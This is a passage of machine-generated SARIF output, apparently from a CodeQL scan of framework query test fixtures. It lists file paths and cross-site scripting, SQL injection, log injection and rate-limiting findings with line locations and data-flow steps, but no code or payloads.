CROOT%","index":554}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":555}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.html","uriBaseId":"%SRCROOT%","index":556}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.js","uriBaseId":"%SRCROOT%","index":557}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":558}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json","uriBaseId":"%SRCROOT%","index":559}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package-lock.json","uriBaseId":"%SRCROOT%","index":560}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package.json","uriBaseId":"%SRCROOT%","index":561}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/ui5.yaml","uriBaseId":"%SRCROOT%","index":562}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js","uriBaseId":"%SRCROOT%","index":563}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":564}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":565}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.html","uriBaseId":"%SRCROOT%","index":566}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.js","uriBaseId":"%SRCROOT%","index":567}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":568}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":569}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package-lock.json","uriBaseId":"%SRCROOT%","index":570}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package.json","uriBaseId":"%SRCROOT%","index":571}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/ui5.yaml","uriBaseId":"%SRCROOT%","index":572}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":573}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js","uriBaseId":"%SRCROOT%","index":574}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":575}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.html","uriBaseId":"%SRCROOT%","index":576}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.js","uriBaseId":"%SRCROOT%","index":577}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":578}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":579}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package.json","uriBaseId":"%SRCROOT%","index":580}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package-lock.json","uriBaseId":"%SRCROOT%","index":581}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/ui5.yaml","uriBaseId":"%SRCROOT%","index":582}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":583}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.html","uriBaseId":"%SRCROOT%","index":584}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.js","uriBaseId":"%SRCROOT%","index":585}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":586}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":587}},{"location":{"uri":"javascript/frameworks/ui5-webcomponents/test/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":588}},{"location":{"uri":"javascript/frameworks/ui5-webcomponents/test/qlpack.yml","uriBaseId":"%SRCROOT%","index":589}},{"location":{"uri":"javascript/frameworks/ui5-webcomponents/test/queries/xss-input-dangerouslySetInnerHTML/.eslintrc.json","uriBaseId":"%SRCROOT%","index":590}},{"location":{"uri":"javascript/frameworks/ui5-webcomponents/test/queries/xss-input-dangerouslySetInnerHTML/package-lock.json","uriBaseId":"%SRCROOT%","index":591}},{"location":{"uri":"javascript/frameworks/ui5-webcomponents/test/queries/xss-input-dangerouslySetInnerHTML/package.json","uriBaseId":"%SRCROOT%","index":592}},{"location":{"uri":"javascript/frameworks/ui5-webcomponents/test/queries/xss-input-dangerouslySetInnerHTML/public/index.html","uriBaseId":"%SRCROOT%","index":593}},{"location":{"uri":"javascript/frameworks/ui5-webcomponents/test/queries/xss-input-dangerouslySetInnerHTML/src/App.tsx","uriBaseId":"%SRCROOT%","index":594}},{"location":{"uri":"javascript/frameworks/ui5-webcomponents/test/queries/xss-input-dangerouslySetInnerHTML/src/index.tsx","uriBaseId":"%SRCROOT%","index":595}},{"location":{"uri":"javascript/frameworks/xsjs/lib/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":596}},{"location":{"uri":"javascript/frameworks/xsjs/lib/qlpack.yml","uriBaseId":"%SRCROOT%","index":597}},{"location":{"uri":"javascript/frameworks/xsjs/src/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":598}},{"location":{"uri":"javascript/frameworks/xsjs/src/qlpack.yml","uriBaseId":"%SRCROOT%","index":599}},{"location":{"uri":"javascript/frameworks/xsjs/test/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":600}},{"location":{"uri":"javascript/frameworks/xsjs/test/qlpack.yml","uriBaseId":"%SRCROOT%","index":601}},{"location":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSAccess/service/.xsaccess","uriBaseId":"%SRCROOT%","index":602}},{"location":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSAccess/service/exposed/.xsaccess","uriBaseId":"%SRCROOT%","index":603}},{"location":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSAccess/service/missing_auth/.xsaccess","uriBaseId":"%SRCROOT%","index":604}},{"location":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSAccess/service/service.xsjs","uriBaseId":"%SRCROOT%","index":605}},{"location":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSAccess/service/xs-app.json","uriBaseId":"%SRCROOT%","index":606}},{"location":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":607}},{"location":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608}},{"location":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSUrlRedirect/XSJSUrlRedirect.xsjs","uriBaseId":"%SRCROOT%","index":609}},{"location":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610}},{"location":{"uri":"javascript/heuristic-models/tests/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":611}},{"location":{"uri":"javascript/heuristic-models/tests/qlpack.yml","uriBaseId":"%SRCROOT%","index":612}},{"location":{"uri":"qlt.conf.json","uriBaseId":"%SRCROOT%","index":613}},{"location":{"uri":"file:/opt/hostedtoolcache/CodeQL/2.23.8/x64/codeql/javascript/tools/data/externs/web/window.js","index":614}},{"location":{"uri":"scripts/CreateTestsFromYaml.py","uriBaseId":"%SRCROOT%","index":615}}],"results":[{"ruleId":"js/missing-rate-limiting","rule":{"id":"js/missing-rate-limiting","index":10,"toolComponent":{"index":1}},"message":{"text":"This route handler performs [a database access](1), but is not rate-limited."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":781,"startColumn":23,"endLine":784,"endColumn":6}}}],"partialFingerprints":{"primaryLocationLineHash":"ac6d3bdd3d52ea9b:1","primaryLocationStartColumnFingerprint":"18"},"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":782,"startColumn":7,"endLine":783,"endColumn":9}},"message":{"text":"a database access"}}]},{"ruleId":"js/xss","rule":{"id":"js/xss","index":33,"toolComponent":{"index":1}},"message":{"text":"Cross-site scripting vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":4,"startColumn":20,"endColumn":25}}}],"partialFingerprints":{"primaryLocationLineHash":"6311a9ed7e4091a4:1","primaryLocationStartColumnFingerprint":"15"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":3,"startColumn":17,"endColumn":51}},"message":{"text":"jQuery. ... param\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":3,"startColumn":9,"endColumn":14}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":4,"startColumn":20,"endColumn":25}},"message":{"text":"value"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":3,"startColumn":17,"endColumn":51}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":3,"startColumn":17,"endColumn":51}}}]},{"ruleId":"js/xss","rule":{"id":"js/xss","index":33,"toolComponent":{"index":1}},"message":{"text":"Cross-site scripting vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":11,"startColumn":20,"endColumn":25}}}],"partialFingerprints":{"primaryLocationLineHash":"8e517fc6fdf32a1a:1","primaryLocationStartColumnFingerprint":"15"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":10,"startColumn":17,"endColumn":41}},"message":{"text":"documen ... .search"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":10,"startColumn":9,"endColumn":14}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":11,"startColumn":20,"endColumn":25}},"message":{"text":"value"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":10,"startColumn":17,"endColumn":41}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":10,"startColumn":17,"endColumn":41}}}]},{"ruleId":"js/xss","rule":{"id":"js/xss","index":33,"toolComponent":{"index":1}},"message":{"text":"Cross-site scripting vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":19,"startColumn":20,"endColumn":26}}}],"partialFingerprints":{"primaryLocationLineHash":"c51cf11a085c01f4:1","primaryLocationStartColumnFingerprint":"15"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":17,"startColumn":17,"endColumn":41}},"message":{"text":"documen ... .search"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":17,"startColumn":9,"endColumn":14}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":18,"startColumn":39,"endColumn":44}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":18,"startColumn":18,"endColumn":45}},"message":{"text":"jQuery. ... (value)"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":18,"startColumn":9,"endColumn":15}},"message":{"text":"value1"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":19,"startColumn":20,"endColumn":26}},"message":{"text":"value1"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":17,"startColumn":17,"endColumn":41}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":17,"startColumn":17,"endColumn":41}}}]},{"ruleId":"js/xss","rule":{"id":"js/xss","index":33,"toolComponent":{"index":1}},"message":{"text":"Cross-site scripting vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":27,"startColumn":20,"endColumn":26}}}],"partialFingerprints":{"primaryLocationLineHash":"e309bf8540256a05:1","primaryLocationStartColumnFingerprint":"15"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":25,"startColumn":17,"endColumn":41}},"message":{"text":"documen ... .search"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":25,"startColumn":9,"endColumn":14}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":26,"startColumn":39,"endColumn":44}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":26,"startColumn":18,"endColumn":45}},"message":{"text":"jQuery. ... (value)"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":26,"startColumn":9,"endColumn":15}},"message":{"text":"value1"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":27,"startColumn":20,"endColumn":26}},"message":{"text":"value1"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":25,"startColumn":17,"endColumn":41}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":25,"startColumn":17,"endColumn":41}}}]},{"ruleId":"js/sql-injection","rule":{"id":"js/sql-injection","index":34,"toolComponent":{"index":1}},"message":{"text":"This query string depends on a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":782,"startColumn":18,"endColumn":38}}}],"partialFingerprints":{"primaryLocationLineHash":"e7f0d59b4cbe0ccc:1","primaryLocationStartColumnFingerprint":"11"},"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":782,"startColumn":18,"endColumn":38}},"message":{"text":"user-provided value"}}]},{"ruleId":"js/log-injection","rule":{"id":"js/log-injection","index":99,"toolComponent":{"index":1}},"message":{"text":"Log entry depends on a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":7,"startColumn":18,"endColumn":41}}}],"partialFingerprints":{"primaryLocationLineHash":"be9a18716e55d497:1","primaryLocationStartColumnFingerprint":"13"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":6,"startColumn":17,"endColumn":51}},"message":{"text":"jQuery. ... param\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":6,"startColumn":9,"endColumn":14}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":7,"startColumn":34,"endColumn":39}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":7,"startColumn":18,"endColumn":41}},"message":{"text":"`[INFO] ... value}`"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":6,"startColumn":17,"endColumn":51}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":6,"startColumn":17,"endColumn":51}}}]},{"ruleId":"js/log-injection","rule":{"id":"js/log-injection","index":99,"toolComponent":{"index":1}},"message":{"text":"Log entry depends on a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":15,"startColumn":18,"endColumn":41}}}],"partialFingerprints":{"primaryLocationLineHash":"be9a18716e55d497:2","primaryLocationStartColumnFingerprint":"13"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":13,"startColumn":23,"endColumn":30}},"message":{"text":"req.url"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":13,"startColumn":13,"endColumn":37}},"message":{"text":"url.par ... , true)"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":13,"startColumn":9,"endColumn":10}},"message":{"text":"q"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":14,"startColumn":17,"endColumn":18}},"message":{"text":"q"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":14,"startColumn":9,"endColumn":14}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":15,"startColumn":34,"endColumn":39}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":15,"startColumn":18,"endColumn":41}},"message":{"text":"`[INFO] ... value}`"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":13,"startColumn":23,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":13,"startColumn":23,"endColumn":30}}}]},{"ruleId":"js/log-injection","rule":{"id":"js/log-injection","index":99,"toolComponent":{"index":1}},"message":{"text":"Log entry depends on a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":24,"startColumn":18,"endColumn":42}}}],"partialFingerprints":{"primaryLocationLineHash":"e197b363f9dc3962:1","primaryLocationStartColumnFingerprint":"13"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":21,"startColumn":23,"endColumn":30}},"message":{"text":"req.url"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":21,"startColumn":13,"endColumn":37}},"message":{"text":"url.par ... , true)"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":21,"startColumn":9,"endColumn":10}},"message":{"text":"q"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":22,"startColumn":17,"endColumn":18}},"message":{"text":"q"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":22,"startColumn":9,"endColumn":14}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":23,"startColumn":39,"endColumn":44}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":23,"startColumn":18,"endColumn":45}},"message":{"text":"jQuery. ... (value)"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":23,"startColumn":9,"endColumn":15}},"message":{"text":"value1"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":24,"startColumn":34,"endColumn":40}},"message":{"text":"value1"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":24,"startColumn":18,"endColumn":42}},"message":{"text":"`[INFO] ... alue1}`"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":21,"startColumn":23,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":21,"startColumn":23,"endColumn":30}}}]},{"ruleId":"js/log-injection","rule":{"id":"js/log-injection","index":99,"toolComponent":{"index":1}},"message":{"text":"Log entry depends on a [user-provided 